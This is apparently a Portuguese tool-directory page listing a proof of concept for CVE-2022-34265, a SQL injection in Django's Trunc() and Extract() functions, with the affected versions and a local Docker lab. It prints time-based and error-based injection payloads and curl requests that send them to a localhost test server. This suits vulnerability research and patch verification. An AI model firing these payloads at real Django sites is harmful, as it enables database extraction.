Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/zhaoqi99/cve-2022-34265
Análise de VulnerabilidadesAnálise de CódigoExploraçãoExploração de Aplicações WebTestes de PenetraçãoSegurança de Banco de Dados
GitHubzhaoqi99/cve-2022-34265

CVE-2022-34265

PoC para CVE-2022-34265

Ver Repositório
4há 3 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2022-34265

PoC para CVE-2022-34265


Descrição

Foi descoberto um problema no Django 3.2 antes da versão 3.2.14 e no Django 4.0 antes da versão 4.0.6. As funções de banco de dados Trunc() e Extract() estão sujeitas a injeção de SQL se dados não confiáveis forem usados como valor de kind/lookup_name. Aplicações que restringem a escolha do lookup name e do kind a uma lista segura conhecida não são afetadas.

Como usar

Iniciar

root@kitploit:~
git clone https://github.com/ZhaoQi99/CVE-2022-34265.git
cd CVE-2022-34265
docker-compose up -d

Remover

root@kitploit:~
docker-compose down

Versões afetadas

  • Django>= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Versões corrigidas

  • Django 3.2.14

  • Django 4.0.6

Verificação

Ambiente

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

Payload

  • YEAR FROM start_time)) ;select sleep(5)--

  • YEAR FROM start_time)) and updatexml(1,concat(1,(select name from TEST limit 1),1),1)--

Poc

root@kitploit:~
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20%3Bselect%20sleep(5)--"
curl "http://127.0.0.1:8000/extract/?lookup_name=YEAR%20FROM%20start_time))%20and%20updatexml(1%2Cconcat(1%2C(select%20name%20from%20TEST%20limit%201)%2C1)%2C1)--"

PS: No caso de bancos de dados diferentes, a existência de vulnerabilidades é diferente. A vulnerabilidade não existe no backend de banco de dados MYSQL da função Trunc.

Referência

  • Repórter: TAKUTO YOSHIKAI (usando PostgreSQL)

  • django/django@877c800

  • django/django@5e2f4dd

  • https://github.com/advisories/GHSA-p64x-8rxx-wf6q

  • CVE-2022-34265 Django SQL 注入漏洞调试分析 - 先知社区

Baixar ferramenta